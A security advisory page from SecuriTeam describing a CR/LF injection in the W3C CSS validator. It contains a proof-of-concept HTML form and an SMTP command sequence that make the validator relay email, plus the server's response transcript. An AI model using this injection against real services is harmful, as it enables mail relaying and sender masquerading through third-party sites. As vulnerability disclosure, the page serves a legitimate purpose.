SecuriTeam - W3C CSS Validator

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

CanSecWest 2012

2nd Annual Cyber Security

Hack In Paris

As we reported previously a vulnerability exists in the W3C HTML validator that allows for cross-site scripting. The following shows a different issue, where additional CR/LF (Carriage Return/Line Feed) can be inserted into the FORM an attacker fills allowing him for example to send an email through a third party site while masquerading as someone coming from W3C's site (i.e. relaying through it).

Credit:
The information has been provided by Matthew Murphy.

Website Security Scan	Code Vulnerability Test	Network Assessment Tool
Detect hidden vulnerabilities	Exhaustive automated testing	Real-time, continuous security
Get guidance from professionals	of internal or 3rd party code.	scanning for your entire network

Protect your website!
Use an External Vulnerability Scanner!
Nothing to install. First report in 1 hour!
www.beyondsecurity.com/vulnerability-scanner

Another vulnerability at the W3C, this time the CSS validator. A Cr/Lf injection can be performed by creating a custom form:

<FORM METHOD="GET" ACTION="http://jigsaw.w3.org/css-validator/validator">
<INPUT TYPE="hidden" NAME="warning" VALUE="1">
<INPUT TYPE="hidden" NAME="profile" VALUE="css2">
Commands:
<TEXTAREA STYLE="width:300px;height:300px" NAME="uri"
ONDBLCLICK="document.forms(0).submit()"></TEXTAREA>
</FORM>

And filling it in with something like:

[Begin Form]
http://mailserver:25/
HELO 127.0.0.1
MAIL FROM:me@here.com
RCPT TO:you@somewhere.com
DATA
This is a simple message demonstrating the W3 relaying hole
.
QUIT

[End Form]

This results in:

GET /
502 Unknown Command
HELO 127.0.0.1
250 Welcome [138.96.249.65], pleased to meet you
MAIL FROM:me@here.com
250 Sender "me@here.com" OK...
RCPT TO:you@somewhere.com
250 Recipient "you@somewhere.com" OK...
DATA
354 Enter mail, end with "." on a line by itself
This is a simple message demonstrating the W3 relaying hole
.
250 Message accepted for delivery.
QUIT
221 Closing Session

If you relay this properly, the CSS validator will whine about the connection being terminated by the peer (this is done immediately after the SMTP command "QUIT" being sent. There is a 502 error in the logs from "GET /", but that is un-avoidable.

blog comments powered by Disqus

	HP Data Protector LogBackupLocationStatus SQL Injection Vulnerabilty
	InduSoft WebStudio Unauthenticated Operations Code Execution Vulnerabilityy
	InduSoft WebStudio CEServer Operation 0x15 Code Execution Vulnerability
	HP Data Protector Notebook Extension RequestCopy SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension GetPolicies SQL Injection Vulnerabilty
	GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability
	HP Data Protector Notebook Extension LogClientHealth SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension LogCopyOperation SQL Injection Vulnerabilty
	HP Data Protector Notebook Extension FinishedCopy SQL Injection Vulnerabilty
	Novell ZENWorks Software Packaging ISGrid.Grid2.1 Text Parameter Code Execution Vulnerabilit
	Adobe Reader BMP Image RLE Decoding Code Execution Vulnerability
	Apple QuickTime H264 Matrix Conversion Code Execution Vulnerability
	Apple QuickTime FLC Delta Decompression Code Execution Vulnerability
	Apple Quicktime PnPixPat PatType 3 Parsing Code Execution Vulnerability